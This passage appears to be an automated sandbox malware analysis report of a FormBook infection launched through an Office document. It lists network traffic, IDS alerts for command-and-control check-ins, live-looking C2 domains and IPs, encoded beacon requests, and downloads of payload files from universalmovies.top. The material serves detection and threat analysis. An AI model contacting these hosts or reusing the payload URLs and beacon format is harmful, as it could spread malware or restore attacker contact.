      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49176 -> 104.21.89.47:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 15.197.148.33:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49178 -> 167.172.228.26:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49179 -> 15.197.148.33:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 3.33.130.190:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49181 -> 5.149.161.103:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 156.241.141.214:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49183 -> 192.243.61.227:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49184 -> 23.227.38.74:80
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: www.cnoszirzbkaqz.com
      Source: C:\Windows\explorer.exeDomain query: www.onlynaturlpt.shop
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.89.47 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 156.241.141.214 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.turbrun.com
      Source: C:\Windows\explorer.exeNetwork Connect: 5.149.161.103 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.outletivo.com
      Source: C:\Windows\explorer.exeNetwork Connect: 15.197.148.33 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.naddafornadda.com
      Source: C:\Windows\explorer.exeNetwork Connect: 192.243.61.227 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.wirewizardselectric.net
      Source: C:\Windows\explorer.exeDomain query: www.wzxq.xyz
      Source: C:\Windows\explorer.exeNetwork Connect: 167.172.228.26 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.380747.net
      Source: C:\Windows\explorer.exeDomain query: www.texanboxes.com
      Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.emeraldsurrogatefabric.com
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.cnoszirzbkaqz.com/btrd/
      Performs DNS queries to domains with low reputation
      Source: C:\Windows\explorer.exeDNS query: www.wzxq.xyz
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.onlynaturlpt.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.wirewizardselectric.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.cnoszirzbkaqz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.naddafornadda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.texanboxes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.outletivo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=Q9lQV6GZS5XlTzDabQN0JcC/oAJcX56bqSzBmZTdiCofqsMdr9nyT/BrN0q/NN7gaO6C5w==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.380747.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=G5lr6/+HMLb4/5wZr2dUNb9GEJVmzQOhD2on9EEX18ujBqnljNww4TGU/x6wH+Q7WyKaqg==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.emeraldsurrogatefabric.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 172.67.162.95 172.67.162.95
      Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
      Source: Joe Sandbox ViewIP Address: 104.21.74.191 104.21.74.191
      Source: Joe Sandbox ViewIP Address: 192.243.61.227 192.243.61.227
      Source: Joe Sandbox ViewIP Address: 192.243.61.227 192.243.61.227
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewASN Name: ADVANCEDHOSTERS-ASNL ADVANCEDHOSTERS-ASNL
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: global trafficHTTP traffic detected: GET /nelb.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: universalmovies.topConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nelb.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49167 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49169 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49170 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49175 version: TLS 1.0
      Source: C:\Windows\explorer.exeCode function: 13_2_08D62F82 getaddrinfo,setsockopt,recv,13_2_08D62F82
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{61FC82B4-E053-4F29-B36E-352ECE0A54D4}.tmpJump to behavior
      Source: global trafficHTTP traffic detected: GET /nelb.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: universalmovies.topConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nelb.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.onlynaturlpt.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.wirewizardselectric.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.cnoszirzbkaqz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.naddafornadda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.texanboxes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.outletivo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=Q9lQV6GZS5XlTzDabQN0JcC/oAJcX56bqSzBmZTdiCofqsMdr9nyT/BrN0q/NN7gaO6C5w==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.380747.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?QF=G5lr6/+HMLb4/5wZr2dUNb9GEJVmzQOhD2on9EEX18ujBqnljNww4TGU/x6wH+Q7WyKaqg==&rr=F82tHBM8VV6X-vo HTTP/1.1Host: www.emeraldsurrogatefabric.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: universalmovies.top
      Source: global trafficDNS traffic detected: DNS query: www.onlynaturlpt.shop
      Source: global trafficDNS traffic detected: DNS query: www.wirewizardselectric.net
      Source: global trafficDNS traffic detected: DNS query: www.cnoszirzbkaqz.com
      Source: global trafficDNS traffic detected: DNS query: www.naddafornadda.com
      Source: global trafficDNS traffic detected: DNS query: www.turbrun.com
      Source: global trafficDNS traffic detected: DNS query: www.wzxq.xyz
      Source: global trafficDNS traffic detected: DNS query: www.texanboxes.com
      Source: global trafficDNS traffic detected: DNS query: www.outletivo.com
      Source: global trafficDNS traffic detected: DNS query: www.380747.net
      Source: global trafficDNS traffic detected: DNS query: www.emeraldsurrogatefabric.com
      Source: global trafficDNS traffic detected: DNS query: www.furryfriendsupply.store
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 25 Jun 2024 13:17:17 GMTContent-Type: text/html; charset=utf-8Content-Length: 0Connection: close
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
